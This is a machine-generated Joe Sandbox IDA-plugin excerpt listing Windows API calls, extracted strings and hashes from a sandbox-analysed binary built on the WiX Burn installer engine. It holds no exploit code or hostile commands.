                                                                                                                                                                  • lstrlenW.KERNEL32(burn.system.component,burn.system.component,00000000), ref: 00934F8D
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00934F9F
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.system.component), ref: 00934FAF
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.embedded,000000FF), ref: 00935024
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.detect,000000FF), ref: 009350BA
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.upgrade,000000FF), ref: 009350FD
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,burn.related.addon,000000FF), ref: 0093511D
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.dependent.addon,000000FF), ref: 00935141
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.patch,000000FF), ref: 00935164
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.dependent.patch,000000FF), ref: 00935187
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.update,000000FF), ref: 009351AA
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.chain.package,000000FF), ref: 009351D0
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.passthrough,000000FF), ref: 009351F6
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.runonce,000000FF), ref: 00935224
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.ignoredependencies), ref: 00935280
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.ignoredependencies,burn.ignoredependencies,00000000), ref: 0093528E
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 009352A0
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.ignoredependencies), ref: 009352B0
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.ancestors), ref: 00935325
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.ancestors,burn.ancestors,00000000), ref: 00935333
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00935345
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.ancestors), ref: 00935355
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.engine.working.directory), ref: 009353CD
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.engine.working.directory,burn.engine.working.directory,00000000), ref: 009353DB
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 009353ED
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.engine.working.directory), ref: 009353FD
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached), ref: 00935468
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000), ref: 00935476
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00935488
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached), ref: 0093549C
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self), ref: 00935527
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000), ref: 00935535
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00935547
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self), ref: 00935557
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.splash.screen), ref: 009355D0
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.splash.screen,burn.splash.screen,00000000), ref: 009355DE
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 009355F0
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.splash.screen), ref: 00935600
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.), ref: 0093567F
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.,burn.,00000000), ref: 0093568D
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 0093569F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString$lstrlen
                                                                                                                                                                  • String ID: -$Clean room command-line switch must be first argument on command-line.$Failed to allocate the list of ancestors.$Failed to allocate the list of dependencies to ignore.$Failed to copy append log file path.$Failed to copy last used source.$Failed to copy log file path.$Failed to copy parent.$Failed to copy path for layout directory.$Failed to copy source process path.$Failed to ensure size for secret args.$Failed to ensure size for unknown args.$Failed to initialize parent to none.$Failed to parse elevated connection.$Failed to parse embedded connection.$Failed to parse file handle: '%ls'$Failed to parse splash screen window: '%ls'$Failed to store the custom working directory.$Invalid switch: %ls$Missing required parameter for switch: %ls$Multiple mode command-line switches were provided.$Must specify a path for append log.$Must specify a path for log.$Must specify a path for original source.$Must specify a value for parent.$Must specify the elevated name, token and parent process id.$Must specify the embedded name, token and parent process id.$burn.$burn.ancestors$burn.clean.room$burn.elevated$burn.embedded$burn.engine.working.directory$burn.filehandle.attached$burn.filehandle.self$burn.ignoredependencies$burn.log.append$burn.log.mode$burn.passthrough$burn.related.addon$burn.related.chain.package$burn.related.dependent.addon$burn.related.dependent.patch$burn.related.detect$burn.related.patch$burn.related.update$burn.related.upgrade$burn.runonce$burn.splash.screen$burn.system.component$d:\a\wix4\wix4\src\burn\engine\core.cpp$disablesystemrestore$help$keepaupaused$layout$log$modify$noaupause$originalsource$package$parent$parent:none$passive$quiet$repair$silent$uninstall$unsafeuninstall$update$xlog
                                                                                                                                                                  • API String ID: 1657112622-287467567
                                                                                                                                                                  • Opcode ID: 26c4aeaf0432db84c2835fbe9d80b2655a666678c1bc821c1658b85049f13ce7
                                                                                                                                                                  • Instruction ID: c0117d6b0f8383fed89f5c36c6ed5aefef929bf83cfb93511e467a299b6432b8
                                                                                                                                                                  • Opcode Fuzzy Hash: 26c4aeaf0432db84c2835fbe9d80b2655a666678c1bc821c1658b85049f13ce7
                                                                                                                                                                  • Instruction Fuzzy Hash: 7DB21771688711BBEB209B04CC4BF6673A9EB59B24F614A14F566EF2D0D6B4F880CF50
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0092278C
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,DirectorySearch,000000FF,00000000,Condition,00917E53,00000000,Variable,00917E4F,00000000,00981D1C,00917E4B,00917E4B), ref: 00921A63
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,exists,00000000,00000000,Type,00000000,00000000,Path,00917E5F), ref: 00921AD2
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,path,00000000), ref: 00921AEF
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,FileSearch,000000FF), ref: 00921B15
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,exists,00000000,00000000,Type,00000000,00000000,DisableFileRedirection,00917E63,00000000,Path,00917E5F), ref: 00921BB3
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 009222EE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$Compare$FreeHeap$AllocateProcess
                                                                                                                                                                  • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch|ExtensionSearch|SetVariable$DisableFileRedirection$ExpandEnvironment$ExtensionId$ExtensionSearch$Failed to allocate memory for search structs.$Failed to find extension '%ls' for search '%ls'$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @ExtensionId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Value.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get DisableFileRedirection attribute.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$SetVariable$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$assignment$d:\a\wix4\wix4\src\burn\engine\search.cpp$directory$exists$formatted$keyPath$language$numeric$path$state$string$value$version
                                                                                                                                                                  • API String ID: 1229322287-2296787432
                                                                                                                                                                  • Opcode ID: a69fbcc4ce103e2be701d3c459092c66fbe5c77024a5609327184f3cc1b1516e
                                                                                                                                                                  • Instruction ID: a046f7b4e14692281e51285a06c94d9fd37c8e91925fa803c65ed10f1632f515
                                                                                                                                                                  • Opcode Fuzzy Hash: a69fbcc4ce103e2be701d3c459092c66fbe5c77024a5609327184f3cc1b1516e
                                                                                                                                                                  • Instruction Fuzzy Hash: BD828932A84225FBCB206B509C4AFAF3A6EDFD5B14F214064FA18BB2C5D6B4DD41D760
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                  • String ID: @Container is required for embedded payload.$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to add payload to container dictionary.$Failed to add payload to payloads dictionary.$Failed to allocate memory for layout payloads.$Failed to allocate memory for payload structs.$Failed to create dictionary for container payloads.$Failed to create dictionary for payloads.$Failed to find container: %ls$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$File size is required when verifying by hash for payload: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$There was no verification information for payload: %ls$d:\a\wix4\wix4\src\burn\engine\payload.cpp$embedded$external
                                                                                                                                                                  • API String ID: 1357844191-2408702627
                                                                                                                                                                  • Opcode ID: 971ec6ddcbbe1568fed5564735c8159b9b870a24120040a24a8b2fa78594bb6a
                                                                                                                                                                  • Instruction ID: e8954364e5cf9af49efb06a1294065f9b652cbc12c66a7c6acc35d732ce1e79d
                                                                                                                                                                  • Opcode Fuzzy Hash: 971ec6ddcbbe1568fed5564735c8159b9b870a24120040a24a8b2fa78594bb6a
                                                                                                                                                                  • Instruction Fuzzy Hash: F432163278430DBBDB21AA148C66FEF26B9DFC5B14F214038B615BB2C1E6B4E9818754
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,00000000,?,?,?,?,?,00000000,00000000,?,00916DA2,00000000,00000000,8000FFFF,?), ref: 00942EFE
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to run exe with Burn protocol from path: %ls, xrefs: 00942DA3
                                                                                                                                                                  • "%ls", xrefs: 00942AE0
                                                                                                                                                                  • The QuietUninstallString executable path is not in a secure location: %ls, xrefs: 009427F2
                                                                                                                                                                  • Failed to get command-line argument for install., xrefs: 00942A0F
                                                                                                                                                                  • Failed to append the list of dependencies to ignore to the command line., xrefs: 00942BCE
                                                                                                                                                                  • Failed to run EXE process, xrefs: 00942E19
                                                                                                                                                                  • Failed to append the list of ancestors to the command line., xrefs: 00942C0D
                                                                                                                                                                  • Failed to append the relation type to the command line., xrefs: 00942B9B
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\exeengine.cpp, xrefs: 009425A5, 00942641, 00942646, 0094265A, 0094268D, 009426E2, 009426ED, 00942745, 00942750, 00942798, 009427D8, 009428D6, 009428E1, 00942A65, 00942A70, 00942E55, 00942E5B, 00942E72
                                                                                                                                                                  • Failed to append norestart argument., xrefs: 00942B51
                                                                                                                                                                  • -%ls=ALL, xrefs: 00942BBA
                                                                                                                                                                  • Process returned error: 0x%x, xrefs: 00942E64
                                                                                                                                                                  • Failed to append argument from ARP., xrefs: 00942B68
                                                                                                                                                                  • QuietUninstallString is null., xrefs: 009426F5
                                                                                                                                                                  • WixBundleExecutePackageCacheFolder, xrefs: 00942899, 00942F0C
                                                                                                                                                                  • -%ls, xrefs: 00942B87
                                                                                                                                                                  • Failed to parse QuietUninstallString: %ls., xrefs: 00942723
                                                                                                                                                                  • %ls %ls, xrefs: 00942D05
                                                                                                                                                                  • Failed to build executable path., xrefs: 0094267B, 0094287A
                                                                                                                                                                  • Failed to copy executable path., xrefs: 00942786
                                                                                                                                                                  • Failed to append %ls, xrefs: 00942C72
                                                                                                                                                                  • Failed to get parent directory for QuietUninstallString executable path: %ls, xrefs: 00942820
                                                                                                                                                                  • install, xrefs: 0094258D, 00942592
                                                                                                                                                                  • Failed to format argument string., xrefs: 00942CB6
                                                                                                                                                                  • uninstall, xrefs: 00942586
                                                                                                                                                                  • Failed to append the custom working directory to the exepackage command line., xrefs: 00942C3E
                                                                                                                                                                  • Failed to separate command-line arguments., xrefs: 00942AAC
                                                                                                                                                                  • Failed to get command-line argument for repair., xrefs: 009429E2
                                                                                                                                                                  • Failed to get command-line argument for uninstall., xrefs: 00942A95
                                                                                                                                                                  • Pseudo ExePackages must have a fully qualified target path., xrefs: 0094264C
                                                                                                                                                                  • Failed to verify the QuietUninstallString executable path is in a secure location: %ls, xrefs: 009427C6
                                                                                                                                                                  • Failed to query ArpEntry for %hs., xrefs: 00942593
                                                                                                                                                                  • QuietUninstallString must contain an executable path., xrefs: 00942758
                                                                                                                                                                  • Failed to format obfuscated argument string., xrefs: 00942CE5
                                                                                                                                                                  • Invalid Exe package action: %d., xrefs: 009428EF, 00942A7E
                                                                                                                                                                  • Failed to copy package arguments., xrefs: 0094293D
                                                                                                                                                                  • Failed to allocate obfuscated exe command., xrefs: 00942D19
                                                                                                                                                                  • Failed to allocate base command., xrefs: 00942AF4
                                                                                                                                                                  • WixBundleExecutePackageAction, xrefs: 009428B1, 00942F1D
                                                                                                                                                                  • burn.filehandle.self, xrefs: 00942C6D
                                                                                                                                                                  • Failed to evaluate executable package command-line condition., xrefs: 00942AC3
                                                                                                                                                                  • burn.related.chain.package, xrefs: 00942B7F
                                                                                                                                                                  • Failed to run netfx chainer: %ls, xrefs: 00942DE0
                                                                                                                                                                  • -norestart, xrefs: 00942B3D
                                                                                                                                                                  • Failed to get parent directory for pseudo-package: %ls, xrefs: 009426AC
                                                                                                                                                                  • Failed to get cached path for package: %ls, xrefs: 0094284E
                                                                                                                                                                  • burn.ancestors, xrefs: 00942BF4
                                                                                                                                                                  • -%ls=%ls, xrefs: 00942BF9
                                                                                                                                                                  • burn.ignoredependencies, xrefs: 00942BB2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID: -%ls$ -%ls=%ls$ -%ls=ALL$ -norestart$"%ls"$%ls %ls$Failed to allocate base command.$Failed to allocate obfuscated exe command.$Failed to append %ls$Failed to append argument from ARP.$Failed to append norestart argument.$Failed to append the custom working directory to the exepackage command line.$Failed to append the list of ancestors to the command line.$Failed to append the list of dependencies to ignore to the command line.$Failed to append the relation type to the command line.$Failed to build executable path.$Failed to copy executable path.$Failed to copy package arguments.$Failed to evaluate executable package command-line condition.$Failed to format argument string.$Failed to format obfuscated argument string.$Failed to get cached path for package: %ls$Failed to get command-line argument for install.$Failed to get command-line argument for repair.$Failed to get command-line argument for uninstall.$Failed to get parent directory for QuietUninstallString executable path: %ls$Failed to get parent directory for pseudo-package: %ls$Failed to parse QuietUninstallString: %ls.$Failed to query ArpEntry for %hs.$Failed to run EXE process$Failed to run exe with Burn protocol from path: %ls$Failed to run netfx chainer: %ls$Failed to separate command-line arguments.$Failed to verify the QuietUninstallString executable path is in a secure location: %ls$Invalid Exe package action: %d.$Process returned error: 0x%x$Pseudo ExePackages must have a fully qualified target path.$QuietUninstallString is null.$QuietUninstallString must contain an executable path.$The QuietUninstallString executable path is not in a secure location: %ls$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$burn.ancestors$burn.filehandle.self$burn.ignoredependencies$burn.related.chain.package$d:\a\wix4\wix4\src\burn\engine\exeengine.cpp$install$uninstall
                                                                                                                                                                  • API String ID: 2962429428-2088893599
                                                                                                                                                                  • Opcode ID: ade3eb3e63e9e67899ab80190f4a451fe13897afec251783a1e422b8382038b5
                                                                                                                                                                  • Instruction ID: 82931328ad83ccca44bcb7194aefd3ffb28dc5605b14509798f12a03b235aefa
                                                                                                                                                                  • Opcode Fuzzy Hash: ade3eb3e63e9e67899ab80190f4a451fe13897afec251783a1e422b8382038b5
                                                                                                                                                                  • Instruction Fuzzy Hash: F142A131E80319BBEF229F94CC4AFEE7A78BB44B14F514151FA04BA1D1D7B19E909B90
                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0096DAB7
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DAC1
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 0096DB19
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DB23
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 0096DB71
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DB7B
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 0096DBCC
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DBD6
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 0096DC27
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DC31
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 0096DC82
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DC8C
                                                                                                                                                                  • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 0096DD8E
                                                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 0096DDD9
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DDE3
                                                                                                                                                                  • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 0096DE2C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DE36
                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0096DE80
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DE8A
                                                                                                                                                                  • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 0096DED9
                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 0096DF10
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                                                                                                                                  • String ID: Failed to create ACL for system restore.$Failed to create administrator SID for system restore.$Failed to create local service SID for system restore.$Failed to create local system SID for system restore.$Failed to create network service SID for system restore.$Failed to create self SID for system restore.$Failed to initialize COM security for system restore.$Failed to initialize security descriptor for system restore.$Failed to set DACL for system restore.$Failed to set administrators group access for system restore.$Failed to set administrators owner for system restore.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\srputil.cpp
                                                                                                                                                                  • API String ID: 267631441-1154305825
                                                                                                                                                                  • Opcode ID: 3bfd2c9a6ca478dbb751a639ebcbe8dc9c646b1f8856964f03f08357377e165f
                                                                                                                                                                  • Instruction ID: 2de113902f0f895eae27fc4a822d3f65efa13ed454567a64e1774b2ee5fc0db4
                                                                                                                                                                  • Opcode Fuzzy Hash: 3bfd2c9a6ca478dbb751a639ebcbe8dc9c646b1f8856964f03f08357377e165f
                                                                                                                                                                  • Instruction Fuzzy Hash: EDD1B472E4523DABD7309F958C49FDFBABCAF89710F01459AA918F7250D6748D80CAE0
                                                                                                                                                                  APIs
                                                                                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,00916CF2,00000000), ref: 0092BBB4
                                                                                                                                                                  • GetLastError.KERNEL32(009173DE,00000000,00916CF2,00000000,00000000,000000B0,?,?,00916CF2,00000000,00000000), ref: 0092BBBD
                                                                                                                                                                  • CreateNamedPipeW.KERNEL32(00000000,00080003,00000000,00000001,00010000,00010000,00000001,00916CF2,009173DE,00000000,00916CF2,00000000,00000000,000000B0), ref: 0092BC7D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00916CF2,00000000,00000000), ref: 0092BC8B
                                                                                                                                                                  • CreateNamedPipeW.KERNEL32(00000000,00080003,00000000,00000001,00010000,00010000,00000001,00000000), ref: 0092BD32
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092BD3F
                                                                                                                                                                  • CreateNamedPipeW.KERNEL32(00000000,00080003,00000000,00000001,00010000,00010000,00000001,00000000), ref: 0092BDCE
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092BDD9
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,d:\a\wix4\wix4\src\burn\engine\pipe.cpp,0000012D,00000000), ref: 0092BE27
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,d:\a\wix4\wix4\src\burn\engine\pipe.cpp,0000012D,00000000), ref: 0092BE31
                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 0092BE5F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CreateNamedPipe$CloseDescriptorHandleSecurity$ConvertFreeLocalString
                                                                                                                                                                  • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of logging pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create cache pipe: %ls$Failed to create logging pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$\\.\pipe\%ls.Log$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                  • API String ID: 2306725211-2819417629
                                                                                                                                                                  • Opcode ID: bcf4de08e5bdb93a7ff81f9ac8f0f522a46e695169b8f98e84b057e1d6da7612
